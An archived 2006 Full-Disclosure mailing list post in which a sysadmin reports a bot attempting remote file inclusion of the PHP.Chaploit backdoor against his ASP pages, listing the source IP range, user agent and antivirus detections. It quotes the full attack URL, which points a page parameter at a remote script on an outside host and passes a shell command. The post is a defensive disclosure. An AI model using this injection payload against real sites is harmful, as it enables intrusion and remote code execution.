[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Sidewinder Command/Safemode Exploit 4.1 (PHP.Chaploit)

To: "General DShield Discussion List" <list@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Sidewinder Command/Safemode Exploit 4.1 (PHP.Chaploit)
From: "Maxime Ducharme" <mducharme@xxxxxxxxxxxxxxxxxxx>
Date: Mon, 9 Jan 2006 12:00:02 -0500

Hello

we got hit by whats looks like a bot
trying to inject PHP.Chaploit in our sites

Host is in 202.226.224.*
User-Agent : lwp-trivial/1.35

the bot hit one of our dynamic pages (ASP)
trying to inject the PHP script located on
http://www.foxcf.hpgvip.com.br/cse.gif

Full URL was

ourpage.asp?ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado

obviously trying to inject PHP in ASP isnt a good idea,
thats what makes me think this is automated (and dumb) attack

Virustotal says :
AntiVir 6.33.0.75 01.09.2006 Linux/Rootkit 
Avast 4.6.695.0 01.09.2006 PHP:Chaploit 
Avira 6.33.0.75 01.09.2006 Linux/Rootkit 
DrWeb 4.33 01.09.2006 PHP.Chaploit 
Kaspersky 4.0.2.24 01.09.2006 Exploit.PHP.e 
McAfee 4669 01.06.2006 PHP/Chaploit 
(other didnt detect anything)

I also advised sysadmin of the web server hosting this
file.

i just wanted to share this information with the community

have a nice day

Maxime Ducharme




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [SECURITY] [DSA 931-1] New xpdf packages fix arbitrary code execution
Next by Date: [Full-disclosure] [SECURITY] [DSA 932-1] New kpdf packages fix arbitrary code execution
Previous by thread: [Full-disclosure] [SECURITY] [DSA 931-1] New xpdf packages fix arbitrary code execution
Next by thread: [Full-disclosure] [SECURITY] [DSA 932-1] New kpdf packages fix arbitrary code execution
Index(es):
- Date
- Thread